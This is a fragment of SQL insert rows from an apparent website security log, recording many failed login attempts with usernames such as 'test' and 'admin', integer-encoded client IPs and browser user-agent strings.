(103123, 1499367590.412982, 1, 'loginFailInvalidUsername', 'test', 0, 623913265, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103124, 1499367753.800922, 1, 'loginFailInvalidUsername', 'test', 0, 1306113027, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103125, 1499367754.824563, 1, 'loginFailInvalidUsername', 'test', 0, 1306113027, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103126, 1499377875.383862, 1, 'loginFailInvalidUsername', 'test', 0, 1359726059, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103127, 1499377876.370050, 1, 'loginFailInvalidUsername', 'test', 0, 1359726059, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103128, 1499381652.855620, 1, 'loginFailInvalidUsername', 'test', 0, 3137707330, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103129, 1499381654.252044, 1, 'loginFailInvalidUsername', 'test', 0, 3137707330, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103130, 1499382119.555222, 1, 'loginFailInvalidUsername', 'test', 0, 1706102778, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103131, 1499382121.095779, 1, 'loginFailInvalidUsername', 'test', 0, 1706102778, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103132, 1499382332.017429, 1, 'loginFailInvalidUsername', 'test', 0, 87144572, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103133, 1499382333.181908, 1, 'loginFailInvalidUsername', 'test', 0, 87144572, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103134, 1499382672.620203, 1, 'loginFailInvalidUsername', 'test', 0, 3381025341, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103135, 1499382673.869874, 1, 'loginFailInvalidUsername', 'test', 0, 3381025341, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103136, 1499382768.294801, 1, 'loginFailValidUsername', 'admin', 1, 1539836950, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_31_88) AppleWebKit/531.72.20 (KHTML, like Gecko) Chrome/56.2.7128.1856 Safari/532.12 Edge/36.06779'),
(103137, 1499383619.455953, 1, 'loginFailValidUsername', 'admin', 1, 2745975732, 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)'),
(103138, 1499384738.106606, 1, 'loginFailInvalidUsername', 'test', 0, 3376883719, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103139, 1499385425.952231, 1, 'loginFailInvalidUsername', 'test', 0, 1977359605, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103140, 1499385427.730280, 1, 'loginFailInvalidUsername', 'test', 0, 1977359605, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103141, 1499388416.540048, 1, 'loginFailInvalidUsername', 'test', 0, 772389142, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103142, 1499388417.614110, 1, 'loginFailInvalidUsername', 'test', 0, 772389142, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103143, 1499393121.802631, 1, 'loginFailInvalidUsername', 'test', 0, 3171753552, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103144, 1499393124.163763, 1, 'loginFailInvalidUsername', 'test', 0, 3171753552, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103145, 1499393665.797047, 1, 'loginFailInvalidUsername', 'test', 0, 2984045190, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103146, 1499393668.404066, 1, 'loginFailInvalidUsername', 'test', 0, 2984045190, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103147, 1499394278.577868, 1, 'loginFailInvalidUsername', 'test', 0, 3133998086, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103148, 1499395061.530887, 1, 'loginFailInvalidUsername', 'test', 0, 3144492417, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103149, 1499395062.941599, 1, 'loginFailInvalidUsername', 'test', 0, 3144492417, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103150, 1499402415.202996, 1, 'loginFailInvalidUsername', 'test', 0, 2942647362, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103151, 1499402416.399252, 1, 'loginFailInvalidUsername', 'test', 0, 2942647362, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103152, 1499405108.734752, 1, 'loginFailInvalidUsername', 'test', 0, 2886449665, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103153, 1499405110.018002, 1, 'loginFailInvalidUsername', 'test', 0, 2886449665, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103154, 1499405973.813723, 1, 'loginFailInvalidUsername', 'test', 0, 1307971246, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103155, 1499409988.651416, 1, 'loginFailInvalidUsername', 'test', 0, 3624443118, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103156, 1499409990.041252, 1, 'loginFailInvalidUsername', 'test', 0, 3624443118, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103157, 1499410756.204970, 1, 'loginFailInvalidUsername', 'test', 0, 1230688512, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103158, 1499410757.512695, 1, 'loginFailInvalidUsername', 'test', 0, 1230688512, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103159, 1499411412.805789, 1, 'loginFailInvalidUsername', 'test', 0, 3242697621, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103160, 1499411415.011192, 1, 'loginFailInvalidUsername', 'test', 0, 3242697621, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103161, 1499411745.902961, 1, 'loginFailInvalidUsername', 'test', 0, 3418413729, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103162, 1499411747.186243, 1, 'loginFailInvalidUsername', 'test', 0, 3418413729, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103163, 1499412852.873855, 1, 'loginFailInvalidUsername', 'test', 0, 2835193104, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103164, 1499412854.849406, 1, 'loginFailInvalidUsername', 'test', 0, 2835193104, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103165, 1499414006.843478, 1, 'loginFailInvalidUsername', 'test', 0, 1829708752, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103166, 1499414735.636451, 1, 'loginFailInvalidUsername', 'test', 0, 3524286637, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103167, 1499414736.871359, 1, 'loginFailInvalidUsername', 'test', 0, 3524286637, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103168, 1499422230.451542, 1, 'loginFailInvalidUsername', 'test', 0, 2963002102, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103169, 1499422231.422851, 1, 'loginFailInvalidUsername', 'test', 0, 2963002102, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103170, 1499422947.819526, 1, 'loginFailInvalidUsername', 'test', 0, 762559533, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103171, 1499422949.054095, 1, 'loginFailInvalidUsername', 'test', 0, 762559533, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103172, 1499423333.624690, 1, 'loginFailInvalidUsername', 'test', 0, 461089710, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103173, 1499423335.219139, 1, 'loginFailInvalidUsername', 'test', 0, 461089710, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103174, 1499426152.790360, 1, 'loginFailInvalidUsername', 'test', 0, 1502858165, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103175, 1499426153.933988, 1, 'loginFailInvalidUsername', 'test', 0, 1502858165, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103176, 1499426705.400799, 1, 'loginFailInvalidUsername', 'test', 0, 1023837075, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103177, 1499426706.822804, 1, 'loginFailInvalidUsername', 'test', 0, 1023837075, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103178, 1499427075.430162, 1, 'loginFailInvalidUsername', 'test', 0, 1302485194, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103179, 1499427076.395724, 1, 'loginFailInvalidUsername', 'test', 0, 1302485194, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103180, 1499429491.044157, 1, 'loginFailInvalidUsername', 'test', 0, 3646079390, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103181, 1499429541.801375, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1539836950, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_30_87) AppleWebKit/532.81.29 (KHTML, like Gecko) Chrome/56.2.7061.2799 Safari/532.11 Edge/36.15109'),
(103182, 1499431963.976165, 1, 'loginFailInvalidUsername', 'test', 0, 692886810, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103183, 1499431965.163140, 1, 'loginFailInvalidUsername', 'test', 0, 692886810, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103184, 1499432214.369484, 1, 'loginFailInvalidUsername', 'test', 0, 1598917048, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103185, 1499432215.384007, 1, 'loginFailInvalidUsername', 'test', 0, 1598917048, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103186, 1499436480.513437, 1, 'loginFailInvalidUsername', 'test', 0, 778268247, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103187, 1499436481.505970, 1, 'loginFailInvalidUsername', 'test', 0, 778268247, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103188, 1499436621.408923, 1, 'loginFailInvalidUsername', 'test', 0, 3065397759, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103189, 1499436622.968754, 1, 'loginFailInvalidUsername', 'test', 0, 3065397759, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103190, 1499439537.346218, 1, 'loginFailInvalidUsername', 'test', 0, 831992859, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103191, 1499439539.425809, 1, 'loginFailInvalidUsername', 'test', 0, 831992859, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103192, 1499441304.956319, 1, 'loginFailInvalidUsername', 'test', 0, 1741064646, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103193, 1499441307.061243, 1, 'loginFailInvalidUsername', 'test', 0, 1741064646, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103194, 1499442606.566128, 1, 'loginFailInvalidUsername', 'test', 0, 2058258280, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103195, 1499443161.911143, 1, 'loginFailInvalidUsername', 'test', 0, 1494030525, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103196, 1499443162.916036, 1, 'loginFailInvalidUsername', 'test', 0, 1494030525, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103197, 1499445508.493886, 1, 'loginFailInvalidUsername', 'test', 0, 2580631858, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103198, 1499445509.944778, 1, 'loginFailInvalidUsername', 'test', 0, 2580631858, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103199, 1499449087.216447, 1, 'loginFailInvalidUsername', 'test', 0, 762781225, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103200, 1499449088.565694, 1, 'loginFailInvalidUsername', 'test', 0, 762781225, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103201, 1499451472.353190, 1, 'loginFailInvalidUsername', 'test', 0, 3111215852, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103202, 1499451473.408714, 1, 'loginFailInvalidUsername', 'test', 0, 3111215852, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103203, 1499451921.918711, 1, 'loginFailInvalidUsername', 'test', 0, 3398981251, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103204, 1499451923.394816, 1, 'loginFailInvalidUsername', 'test', 0, 3398981251, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103205, 1499452456.144755, 1, 'loginFailInvalidUsername', 'test', 0, 2695964079, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103206, 1499452458.375199, 1, 'loginFailInvalidUsername', 'test', 0, 2695964079, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103207, 1499453346.181901, 1, 'loginFailInvalidUsername', 'test', 0, 1578391621, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103208, 1499453348.570983, 1, 'loginFailInvalidUsername', 'test', 0, 1578391621, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103209, 1499453776.597636, 1, 'loginFailInvalidUsername', 'test', 0, 456755422, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103210, 1499453778.058389, 1, 'loginFailInvalidUsername', 'test', 0, 456755422, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103211, 1499455199.106392, 1, 'loginFailInvalidUsername', 'test', 0, 3536058953, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103212, 1499455201.214011, 1, 'loginFailInvalidUsername', 'test', 0, 3536058953, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103213, 1499455960.775288, 1, 'loginFailInvalidUsername', 'test', 0, 703294956, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103214, 1499455962.017506, 1, 'loginFailInvalidUsername', 'test', 0, 703294956, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103215, 1499456938.748345, 1, 'loginFailInvalidUsername', 'test', 0, 1581570599, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103216, 1499456939.845058, 1, 'loginFailInvalidUsername', 'test', 0, 1581570599, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103217, 1499457647.119509, 1, 'loginFailInvalidUsername', 'test', 0, 1429784052, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103218, 1499457648.164614, 1, 'loginFailInvalidUsername', 'test', 0, 1429784052, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103219, 1499458774.778319, 1, 'loginFailValidUsername', 'admin', 1, 1091807107, 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.5; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.1; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)'),
(103220, 1499461060.363201, 1, 'loginFailValidUsername', 'admin', 1, 1839458824, 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; Media Center PC 6.0; InfoPath.3; MS-RTC LM 8; Zune 4.7'),
(103221, 1499461065.580209, 1, 'loginFailValidUsername', 'admin', 1, 2961112076, 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; Media Center PC 6.0; InfoPath.3; MS-RTC LM 8; Zune 4.7'),
(103222, 1499461404.368991, 1, 'loginFailInvalidUsername', 'test', 0, 694160952, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103223, 1499461405.483350, 1, 'loginFailInvalidUsername', 'test', 0, 694160952, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103224, 1499462496.806803, 1, 'loginFailInvalidUsername', 'test', 0, 1321671518, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103225, 1499462497.860029, 1, 'loginFailInvalidUsername', 'test', 0, 1321671518, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103226, 1499469619.624797, 1, 'loginFailInvalidUsername', 'test', 0, 782623857, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103227, 1499469620.831025, 1, 'loginFailInvalidUsername', 'test', 0, 782623857, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103228, 1499476695.218279, 1, 'loginFailValidUsername', 'admin', 1, 1539836950, 'Mozilla/5.0 (Windows NT 6.2; WOW64; x64) AppleWebKit/531.85.38 (KHTML, like Gecko) Chrome/56.3.9767.4039 Safari/534.46 OPR/44.5.0580.5852'),
(103229, 1499479516.941897, 1, 'loginFailInvalidUsername', 'test', 0, 3142512570, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103230, 1499479518.540140, 1, 'loginFailInvalidUsername', 'test', 0, 3142512570, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103231, 1499483664.415407, 1, 'loginFailInvalidUsername', 'test', 0, 1866703826, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103232, 1499483666.395214, 1, 'loginFailInvalidUsername', 'test', 0, 1866703826, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103233, 1499487408.126070, 1, 'loginFailInvalidUsername', 'test', 0, 3357589674, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103234, 1499487409.318339, 1, 'loginFailInvalidUsername', 'test', 0, 3357589674, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103235, 1499492032.716254, 1, 'loginFailInvalidUsername', 'test', 0, 1422551407, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103236, 1499492033.950938, 1, 'loginFailInvalidUsername', 'test', 0, 1422551407, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103237, 1499493370.380315, 1, 'loginFailInvalidUsername', 'test', 0, 3032368051, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103238, 1499493371.949160, 1, 'loginFailInvalidUsername', 'test', 0, 3032368051, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103239, 1499496098.477501, 1, 'loginFailInvalidUsername', 'test', 0, 1242341658, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103240, 1499496099.634621, 1, 'loginFailInvalidUsername', 'test', 0, 1242341658, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103241, 1499496253.612508, 1, 'loginFailInvalidUsername', 'test', 0, 2995178620, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103242, 1499496254.684542, 1, 'loginFailInvalidUsername', 'test', 0, 2995178620, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103243, 1499498183.850119, 1, 'loginFailInvalidUsername', 'test', 0, 1143591573, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103244, 1499498184.994760, 1, 'loginFailInvalidUsername', 'test', 0, 1143591573, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103245, 1499498990.547522, 1, 'loginFailInvalidUsername', 'test', 0, 2023437073, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103246, 1499498992.325459, 1, 'loginFailInvalidUsername', 'test', 0, 2023437073, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103247, 1499501952.820130, 1, 'loginFailInvalidUsername', 'test', 0, 1124218043, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103248, 1499503443.915188, 1, 'loginFailInvalidUsername', 'test', 0, 3136808888, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103249, 1499503445.298515, 1, 'loginFailInvalidUsername', 'test', 0, 3136808888, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103250, 1499506662.248021, 1, 'loginFailInvalidUsername', 'test', 0, 3165405706, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103251, 1499506663.355240, 1, 'loginFailInvalidUsername', 'test', 0, 3165405706, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103252, 1499507571.542063, 1, 'loginFailInvalidUsername', 'test', 0, 1545935912, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103253, 1499507572.562232, 1, 'loginFailInvalidUsername', 'test', 0, 1545935912, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103254, 1499507901.586498, 1, 'loginFailInvalidUsername', 'test', 0, 2942657433, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103255, 1499507903.265082, 1, 'loginFailInvalidUsername', 'test', 0, 2942657433, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103256, 1499510534.266406, 1, 'loginFailInvalidUsername', 'test', 0, 1579325406, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103257, 1499510535.363284, 1, 'loginFailInvalidUsername', 'test', 0, 1579325406, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103258, 1499514323.854951, 1, 'loginFailInvalidUsername', 'test', 0, 2399104775, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103259, 1499514325.006298, 1, 'loginFailInvalidUsername', 'test', 0, 2399104775, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103260, 1499516966.582550, 1, 'loginFailInvalidUsername', 'test', 0, 736330760, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103261, 1499516968.068386, 1, 'loginFailInvalidUsername', 'test', 0, 736330760, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103262, 1499518760.357705, 1, 'loginFailInvalidUsername', 'test', 0, 1208727579, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103263, 1499518761.496322, 1, 'loginFailInvalidUsername', 'test', 0, 1208727579, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103264, 1499520297.414146, 1, 'loginFailInvalidUsername', 'test', 0, 1287243095, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103265, 1499520298.858691, 1, 'loginFailInvalidUsername', 'test', 0, 1287243095, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103266, 1499520335.671251, 1, 'loginFailInvalidUsername', 'test', 0, 1705472359, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103267, 1499520337.202662, 1, 'loginFailInvalidUsername', 'test', 0, 1705472359, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103268, 1499521646.582705, 1, 'loginFailInvalidUsername', 'test', 0, 84712992, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103269, 1499521758.930158, 1, 'loginFailInvalidUsername', 'admin2', 0, 887721709, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(103270, 1499521759.259855, 1, 'loginFailInvalidUsername', 'admin2', 0, 887721709, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(103271, 1499521759.569018, 1, 'loginFailInvalidUsername', 'admin2', 0, 887721709, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
